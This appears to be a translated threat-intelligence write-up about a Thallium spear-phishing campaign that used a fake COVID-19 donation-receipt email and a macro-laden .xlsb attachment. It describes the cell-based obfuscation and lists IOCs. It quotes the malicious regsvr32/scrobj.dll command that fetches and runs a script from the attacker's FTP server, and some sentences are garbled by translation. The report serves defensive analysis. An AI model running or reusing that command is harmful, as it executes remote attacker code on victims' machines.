thallium

Thallium Conducts Spear Phishing Attack To 2021 Corona19

Introduction

Recently, the situation of a hacking attack(Thallium), pretending to be a document for issuance of a donation receipt to respond to Corona 19 in 2021, was caught. In time for the year-end settlement season, this attack was subtly disguised as an e-mail request for a donation receipt from a specific private relief association in Korea.

The following is the email screen used in the actual attack, and other similar attacks are also in progress.

clip_image002

[Figure 1] Hacking email disguised as sent from a specific disaster relief association organization

A compressed file named ‘2021 Corona 19 Response_Donation Certificate.zip’ is attached to the email.

There are 2 files inside the compressed file.

● Corona 19 Response in 2021_Donation Certificate.pdf

● Application for issuance of large donation receipts_form_individual.xlsb

The ‘ 2021 Corona 19 Response_Donation Certificate.pdf’ file contains the contents of the donation certificate as follows.

clip_image004

[Figure 2] PDF document screen containing the contents of the normal donation certificate

” Daryang gibugeum yeongsujeung balgeub sincheongseo _ _ yangsik gaein .xlsb ‘MS Excel Binary Worksheet (.xlsb) If you like to run doelgyeong It shows the screen like a protected file and induces you to click the [Use Content] button.

clip_image006

[Figure 3] Macro execution induction screen

If you select to use content and the macro function is allowed, the following screen is displayed, connecting to the attacker’s command control (C2) server and performing additional actions.

clip_image008

[Figure 4] Actual document contents displayed after macro operation

By showing a normal document screen like this, it tricks the user as if there is no problem, and hides the exposure to malicious files. However, the computer in the background connects to the FTP server specified by the attacker and attempts additional commands.

※ [Command control address]
-ftp://mufasa:[email protected][.]com:21/ forbaby .png

The actual’Mass Donation Receipt Issuance Application_Form_Personal.xlsb’ file contains the following code in the internal macro sheet.

clip_image010

[Figure 5] Macrosheets internal code screen

When analyzing the commands included in the Excel sheet, an equal sign (=) was used in the first cell character to be regarded as a formula, and the server string was used in an obfuscation method in which each character was put in a separate cell.

clip_image012

[Figure 6] server address cell obfuscation screen

D21 =:
A18 = f
4 = t
B29 = p
D21 =:
B15 = /
B15 = /
B4 = m
B25 = u
A18 = f
C10 = a
B12 = s
C10 = a
D21 =:
B12 = s
B20 = i
B4 = m
E1 = b
C10 = a
C19 = @

When all the obfuscated strings are analyzed, the attacker connects to the FTP server designated by the attacker through the regsvr32.exe command, and is called through the Script Component Runtime argument.

regsvr32 / u / n / s / i: ftp://mufasa:[email protected] [.] com/forbaby.png scrobj.dll

With this routine, arbitrary malicious scripts in URL (FTP) addresses can be executed, and further attacks are possible at any time depending on the intent of the attacker.

In the process of investigating this threat case, ESRC researchers confirmed that the content of’Tallium organization, exploiting private stock investment messenger to conduct software supply chain attack ‘ on Jan. 03 is highly similar.

The malicious document files discovered at the time were associated with Tactics, Techniques, and Procedures (TTPs). The last modifier account of the malicious document file is the same as’Asus’.

clip_image014 clip_image016 clip_image018
clip_image020 clip_image022 clip_image024

In addition, the Passive DNS IP address (23.106.160.32) used as the server matches exactly.

● Investigation of users of illegally used phone number suspension system (UNMS)_form.xlsb

(search.greenulz[.]com / 23.106.160.32)

● Application for issuance of large donation receipts_form_individual.xlsb

(kvz.factorgpu [.] com / 23.106.160.32)

In Korea, the Thallium organization is currently classified as the most active threat actor, and is conducting a wide range of attacks targeting various fields.

IOCs

search.greenulz.com

kvz.factorgpu.com

23.106.160.32

23.106.160.32